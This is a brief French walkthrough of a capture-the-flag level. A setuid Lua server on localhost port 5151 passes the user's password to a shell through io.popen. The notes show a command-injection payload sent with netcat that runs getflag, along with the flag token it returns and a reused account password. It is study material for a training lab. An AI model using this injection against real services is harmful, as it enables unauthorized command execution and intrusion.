31 lines
1.1 KiB
Plaintext
31 lines
1.1 KiB
Plaintext
* Dans le home il y a un script lua
|
|
|
|
$ ll
|
|
> rwsr-sr-x 1 flag11 level11 668 Mar 5 2016 level11.lua*
|
|
|
|
* Ca semble etre un server. On tante de se conecter au localhost avec le port 5151
|
|
$ nc localhost 5151
|
|
> Password: kjksd
|
|
> Erf nope..
|
|
|
|
* Il semblerait donc que ce soit bien a ce stript lua que l'on comunique via netcat.
|
|
* On peut trouver le nombre f05d1d066fb246efe0c6f7d095f909a7a0cf34a0.
|
|
* Google nous apprend que c'est le hash de "NotSoEasy" toute fois ce mot de passe ne donne rien
|
|
|
|
* Par contre en observant mieux on voit qu'une chaine ne charactere comptenant
|
|
* le mot de passe que l'on envoie semble etre executer en shell avec les back quot line 11
|
|
* io.popen() lance un souproces et execute la chaine e character qui lui est envoyer.
|
|
* On va essayer de lancer getflag en arretant la comande avec ';'
|
|
|
|
$ nc localhost 5151
|
|
> Password: ; /bin/getflag > /tmp/bingo
|
|
|
|
$ cat /tmp/bingo
|
|
> Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s
|
|
|
|
BINGO
|
|
|
|
Si non le mot de passe du compte flag11 est le meme que celui du compte flag10 et c'est:
|
|
woupa2yuojeeaaed06riuj63c
|
|
|